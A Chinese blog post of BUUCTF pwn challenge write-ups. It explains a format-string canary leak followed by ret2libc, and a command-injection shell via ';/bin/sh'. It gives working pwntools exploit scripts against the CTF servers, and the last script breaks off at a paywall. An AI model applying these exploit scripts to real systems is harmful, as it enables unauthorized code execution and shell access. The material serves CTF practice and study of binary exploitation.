pwn入门-buu第二页题解(32道)(持续更新中),一起刷完了这份1307页的网络安全面试宝典吧

于 2024-04-06 03:08:56 发布
阅读量558 收藏 9
点赞数 19
分类专栏: 2024年程序员学习 文章标签: web安全 面试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61068496/article/details/137415433
版权

有print(format),格式化字符串漏洞啊.那么有什么用呢?别急接着往下看

看到vuln函数可以栈溢出,哎,但是这个v2 = __readfsqword(0x28u)是什么意思呢?不知道师傅们有没有了解过,这是栈的一种保护措施,这就是canary.简单介绍一下,就是在rbp下方的8个字节放置的一个随机数,然后在函数返回时检查这个随机数有没有被篡改,如果被篡改了,那么程序将立刻终止,那么现在知道这个格式化字符串有什么用了吧.我们只要好好利用这个漏洞就可以把canary泄露出来,然后再填上去,就可以成功栈溢出了,那么后面的不过是简单的ret2libc,但是有一点值得要说的是,这里泄露出来的canary是str也就是字符型的,不能立马就打包发送,我们要先用int(canary,16)来把它转化为16进制的整型才可.思路到这就结束了,如果师傅们打不通的话可以试试多动调

exp:

点击查看代码

from pwn import *
context.log_level=“debug”
elf=ELF(“buu37”)
p=remote(“node5.buuoj.cn”,26874)
#p=process(“./buu37”)
#libc=ELF(‘/lib/x86_64-linux-gnu/libc.so.6’)
libc = ELF(‘libc-2.23.so_16_64’)
puts_plt=elf.symbols[“puts”]
puts_got=elf.got[“puts”]
volun_addr=0x400887
rdi=0x0000000000400993
rsi_r15=0x00000000004006b1
ret=0x00000000004005f9
#gdb.attach§
#pause()
p.recvuntil(b"I’ll give u some gift to help u!\n")
p.sendline(b’%7$p’)

canary=p.recv(18)
go=int(canary, 16)
print((canary))
p.recvuntil(b"Pull up your sword and tell me u story!\n")
payload1=b’a’*0x18+p64(go)+b’a’*0x8+p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(volun_addr)
p.sendline(payload1)

puts_addr=u64(p.recvuntil(b’\n’)[:-1].ljust(8,b’\0’))
print(hex(puts_addr))

offset=puts_addr-libc.sym[‘puts’]
sys_addr=offset+libc.sym[‘system’]
bin_addr=offset+next(libc.search(b"/bin/sh"))
payload2=b’a’*0x18+p64(go)+b’a’*0x8+p64(rdi)+p64(bin_addr)+p64(ret)+p64(sys_addr)
p.recv()
p.send(payload2)
p.interactive()

buu三十八题(pwnable_orw)

这里

buu三十九题(bjdctf_2020_router)

这里一看题目我还以为输入一个1再输入/bin/sh,就可以getshell了,结果是我想错了。不知道为什么在发送/bin/sh的时候为什么还要在前面加一个’;'号

看学长是wp说是web版的命令执行,看不懂啊,也不知道咋解释,先上exp吧以后再说吧

点击查看代码

from pwn import *
context.log_level = ‘debug’
context(os = ‘linux’, arch = ‘i386’)
#p = process(‘./buu39’)
#gdb.attach§
p = remote(“node5.buuoj.cn”,26069)

p.sendline(‘1’)
pause()
p.sendline(‘;/bin/sh’)
p.interactive()

buu四十题(jarvisoj_level4)

ret2libc

点击查看代码

from pwn import *
#p=process(“./buu40”)
p=remote(“node5.buuoj.cn”,26676)
libc=ELF(“libc-2.23.so_16_32”)
e=ELF(“./buu40”)
write_glt=e.symbols[“write”]
write_got=e.got[“write”]
back=0x804844B

payload1=b’a’(0x88+0x4)+p32(write_glt)+p32(back)+p32(1)+p32(write_got)+p32(4)
p.send(payload1)
write_addr=u32(p.recv(4))#这里我是把收到的数据进行u32解包得到的数据,你们的可能会不一样
libc_write=libc.symbols[‘write’]
libc_system=libc.symbols[‘system’]
libc_sh

最低0.47元/天 解锁文章
嘻嘻哈哈学编程
关注
  • 19
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF:pwnable_orw
qq_44768749的博客
08-27 1513
BUUCTF:pwnable_orw0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 32位程序,开启了canary保护 0x02 运行 提示输入shellcode 0x03 IDA main函数 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是
pwnable_orw-seccomp沙箱
个人笔记
04-11 697
但是,并不是所有的系统调用都被需要,而且不安全的代码滥用系统调用会对系统造成安全威胁。seccomp安全机制能使一个进程进入到一种“安全”运行模式,该模式下的进程只能调用4种系统调用(system call),即 read(), write(), exit() 和 sigreturn(),否则进程便会被终止。还能调用o(open)/r(read)/w(write)功能,题目orw的提示就是这样来的!输出flag文件内容,sys_write(1,file,0x30);手动生成读取文件shellcode。
pwnable_orw
m0_58426698的博客
03-21 333
pwn的最经典的orw的题目,顺便学了一下手写汇编,对传参有了更深的理解
PWN题】Pwnable-Start、Pwnable-orw
QYbudong的博客
05-03 1398
③思路:打开文件sys_open('/home/orw/flag',0,0),读取文件sys_read(3,flag,0x100),写入标准输出sys_write(1,flag,0x30)。当然也可以用上边所说的,自己写汇编然后用asm生成shellcode,这种比较标准的函数还是建议用shellcraft,比较方便。这里解释一下,0x68732f6e和0x69622f2f组合在一起是hs/nib//,也就是binsh的小端序写法;而0xb,也就是11,是execve的系统调用号。入门级题目,保护全关。
BUUCTF pwnable_orw WP
weixin_44645415的博客
08-18 316
限制系统调用&&shellcode 1,文件分析 checksec Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 有canary保护,但是又有存在RWX权限的段,可以考虑写入shellcod
2022年网络安全竞赛天津市赛任务九-PWN(2)
12-20
1.访问靶机 FSserver登录FTP,找到pwn1文件夹,下载内容进行作答,通过缓冲区溢出 对pwn1靶机进行破解,获取目标靶机 shell得到flag: Flagf}样例: flag{×xxx}。nc pwn1靶机ip 10000 2. 访问靶机FServer登录FTP,...
信息安全PWN入门指导
07-18
信息安全PWN入门指导:用于CTF的入门PWN的学习,是入门指导。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举,支持功能和开发模块,同时将所有这些都打包在命令行界面,并且易于使用和可扩展的类贝壳环境。 作者 功能支持 Credential ...
pwn题目的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
0ctf-2017-pwn-char-libc.so
02-05
2017年0ctf的pwn题char的libc库文件
[BUUCTF]PWN——pwnable_orw
mcmuyanga的博客
11-10 1829
pwnable_orw 附件 步骤: 例行检查,32位程序,开启了canary 本地运行一下程序,看看大概的情况,提示我们输入shellcode 32位ida载入,检索字符串,没看见什么可以直接利用的,直接看main函数 orw_seccomp函数 prctl在百度后知了是沙盒机制,具体的看这篇文章 prctl seccomp相当于内核的一种安全机制,正常情况下,程序可以使用所有的syscall,但是当劫持程序流程之后通过exeve来呼叫syscall得到shell时seccomp边
BUUCTF pwn——pwnable_orw
CNS-Enterprise BCC-1701-J
05-06 171
BUUCTF 做题练习
[PWN]pwnable_orw prctl()函数
LDX的博客
09-16 139
BUUCTF pwn prctl-seccomp
[BUUCTF-pwn]——pwnable_orw
半岛铁盒的博客
06-12 1215
记一次ORW的题目 orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 32位程序,开启了canary 调用orw_seccomp函数后,输入shellcode后执行shellcode 写入sys_call的shellcode,发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写,其是 Linux kernel 从2.6.23版本引入的一种简洁的 sandbox
pwnable.tw---orw
杀生丸?不,其实我要的是桔梗
05-01 1544
pwnable.tw—orw 这题主要考验的是shellcode的自我制作,建议学会Linux Sysycall Reference 再来,或者第一题start彻底搞会。 题目分析: 照例: 就开了栈保护,虽然都没有什么用。 题目开始就是让你输入shellcode。 就用msf随便试了几下,发现有些被过滤了。 调试看看: 发现调用了seccomp,百度了下是一个linu...
ctfshow pwn入门
最新发布
09-29
ctfshow pwn入门是一个关于ASLR(地址空间布局随机化)的题目。在该题目,程序会读取系统/proc/sys/kernel/randomize_va_space文件的内容,如果内容为0,则输出的flag是正确的,否则输出的flag是错误的。所以,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值